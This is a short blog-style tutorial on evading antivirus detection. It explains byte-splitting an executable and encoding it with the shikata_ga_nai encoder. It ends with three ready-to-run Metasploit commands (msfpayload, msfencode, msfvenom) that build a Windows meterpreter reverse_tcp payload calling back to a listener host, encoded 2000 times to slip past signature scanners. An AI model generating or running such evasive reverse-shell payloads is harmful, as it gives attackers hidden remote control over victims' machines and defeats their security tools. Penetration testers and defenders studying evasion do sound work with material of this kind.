This is going to be a very technical post. I’m going to leave a few parts out and force you to search around a bit if you want to actually accomplish the title. The purpose being, that I don’t want to have copy-and-pasteable text for anyone with Kali Linux to bypass AV.
First, the theory. Antivirus works on signatures. So, change the signaturized portion of the code and evade AV. There are a few ways you can do this. Either way, if you have a specific executable you want to run, you’ll have to modify it. One way is to split up the executable until you find the bytes that are being alerted on. A second way we’ll discuss is to use encoding.
The first way is to use a program like dsplit to split up your program into several pieces. From there, on a test machine you’d continue to split it up and scan it with the AV you’re intending on bypassing until you find the byte it alerts on. Change the byte and reassemble the executable. In the end, your new executable should work and not set off any alarms. One issue with this is that you may actually lose some functionality in the byte(s) you change. That’s not good.
The second way is to utilize an encoding method. In our example, we’ll use Shikata Ga Nai. Defined by Rapid7 as, “This encoder implements a polymorphic XOR additive feedback encoder.
The decoder stub is generated based on dynamic instruction
substitution and dynamic block ordering. Registers are also
selected dynamically.” Essentially, you’re going to make your program look entirely different to AV without changing any functionality. This encoder will also change things differently every time, even when the same command is executed (redefining insanity).
If you take Metasploit’s bread and butter, meterpreter, and put it into virustotal.com you’ll see that just about every AV lights up. Woot! WIN FOR AV!
Now if we take meterpreter and run it through the shikata_ga_nai encoder several times you’ll start noticing more green check marks identifying the program as good-to-go on virustotal.com. Do it enough and you’ll get a lot of them checked off. There’s a very simple next step you can take that will actually bypass all of them and run flawlessly. However, that’s my secret that I’m going to keep… probably.
So, here’s the commands:
Unencoded version —
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=4444 X > meterpreter.exe
MSFPayload/MSFEncode version —
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 2000 -t exe -o /root/Desktop/encoded_meterpreter.exe
MSFVenom version —
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=4444 -e x86/shikata_ga_nai -i 2000 > encoded_meterpreter.exe